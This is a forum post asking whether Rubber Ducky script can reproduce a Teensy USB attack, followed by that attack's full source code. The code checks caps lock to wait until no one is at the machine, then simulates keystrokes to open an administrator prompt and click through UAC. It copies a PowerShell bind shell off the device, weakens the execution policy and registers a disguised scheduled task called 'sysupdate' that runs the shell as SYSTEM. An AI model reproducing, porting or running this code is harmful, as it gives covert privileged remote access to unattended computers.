I found this teensy code on leg3nd's website. It basically turns on the caps lock and waits to see if anyone turns it off. Then, if no one turns it off in a given amount of time, it executes the payload. I was wondering if there is anything in the duck script that can do something similar?
/* leg3nd's Windows powershell bindshell w/ system
Based on PhukdLib by irongeek, powershell bindshell by Rel1k
Detects user to implement attack based on capslock state
-MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK
*/
#include "usb_private.h"
#define send_enter() send_keys(KEY_ENTER, 0);
#define send_caps() send_keys(KEY_CAPS_LOCK, 0);
#define send_windows() send_keys(0, 128);
#define send_alt_y() send_keys(KEY_Y, MODIFIERKEY_ALT);
#define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI);
int attacked = 0;
void setup(){
pinMode(11, OUTPUT);
delay(5000);
startDelay(30, 25); //startup blink
}
void loop(){
delay(9000); // Time between attack checks
if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap
int userState = 0;
for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks
delay(3000); //Delay between caps lock check iterations
if (IsCapsOn()){
delay(3000); //Delay after caps lock is found to be on
} else {
userState = userState + 1;
}
}
if (userState>0){
delay(300000); //Time to wait if user is detected, 300K = 5min
} else {
AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned");
delay(200);
AdminCmd("schtasks /create /tn sysupdate /i /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59");
delay(200);
AdminCmd("schtasks /run /tn sysupdate");
delay(999999999); //Just chill, payload already executed (max 11.5 days)
}
}
//Execute command as administrator
void AdminCmd(char *SomeCommand) {
send_windows();
delay(1500); //Delay for start menu to come up
Keyboard.print(SomeCommand);
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
Keyboard.send_now();
send_enter();
delay(1000); //Delay for UAC prompt
send_alt_y();
}
//LED key checking for caps lock
int ledkeys(void){
return int(keyboard_leds);
}
//Return the state of caps lock, regardless of other lights.
boolean IsCapsOn(){
if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7){
return true;
} else {
return false;
}
}
//Key & Utility functions
void startDelay(int count, int dlay){ //debug testing light
for (int i=0; i<count; i++){
digitalWrite(11,HIGH);
delay(dlay);
digitalWrite(11,LOW);
delay(100);
}
}
void release_keys(){
Keyboard.set_key1(0);
Keyboard.set_modifier(0);
Keyboard.send_now();
delay(100);
}
void send_keys(int key, int modifier){
if(modifier)
Keyboard.set_modifier(modifier);
Keyboard.set_key1(key);
Keyboard.send_now();
delay(100);
release_keys();
}